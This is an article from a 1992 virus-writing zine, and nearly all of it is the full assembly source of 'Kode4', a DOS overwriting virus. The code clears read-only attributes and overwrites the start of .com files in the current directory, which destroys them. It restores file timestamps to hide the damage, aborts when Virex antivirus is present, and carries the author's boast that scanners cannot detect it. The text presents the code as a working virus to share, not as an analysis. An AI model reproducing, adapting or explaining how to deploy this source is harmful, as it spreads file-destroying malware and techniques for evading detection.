ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92

Article Title: Kode 4 v1 Virus
Author: Soltan Griss


;######################################################################
;#  Name:  Kode4 version 1.0 (overwritting stage)
;#  Author:  Soltan Griss  [YAM]
;#
;#  Description: What this sucker does is very simple. it overwrites
;#               the first 46 bytes of all com files in the current
;#               directory, with it's own code... as of scanv93, this
;#               virus is undetectable..
;#
;#
;#  Special Thanks go out to Data Disruptor.. If it were not for you i
;#          would still be fucking lost!!!!
;#
;######################################################################

seg_a           segment byte public
                assume  cs:seg_a, ds:seg_a


                org     100h
V_Length        equ     last-start
KODE4           proc    far       

start           label   near            ;Check for Virex installiation
          
                mov     ax,0ff0fh
                int     21h
                cmp     ax,0101h        ;Abort if Virex Protection
                je      done            ; present


                mov     ah,4Eh             ;Find first Com file
                mov     dx,offset filename ;use "*.com"     
                int     21h                
                                    
Back:                                       
                mov     ah,43h              ;get rid of read only
                mov     al,0
                mov     dx,9eh
                int     21h
                mov     ah,43h
                mov     al,01
                and     cx,11111110b
                int     21h
          
                mov     ax,3D01h           ;Open file for writing
                mov     dx,9Eh             ;get file name from file DTA
                int     21h                  
                                        
                mov     bx,ax               ;save handle in bx
                mov     ah,57h              ;get time date
                mov     al,0
                int     21h
                
                push    cx                  ;put in stack for later
                push    dx


                mov     dx,100h            ;Start writing at 100h
                mov     cl,v_length        ;write 46 bytes
                mov     ah,40h             ;Write Data into the file
                int     21h                   
                                              
                                              
                pop     dx                 ;Restore old dates and times 
                pop     cx
                mov     ah,57h
                mov     al,01h
                int     21h



                mov     ah,3Eh             ;Close the file
                int     21h                   
                                               
                mov     ah,4Fh             ;Find Next file
                int     21h                    
                                                
                jnc     Back                 
                mov     ah,9h
                mov     dx,offset DATA
                int     21h

done:           int     20h                ;Terminate Program
filename        db      "*.c*",0                     
DATA            db      " -=+ Kode4 +=-, The one and ONLY!$"


kode4           endp
LAST            label near
seg_a           ends
                end     start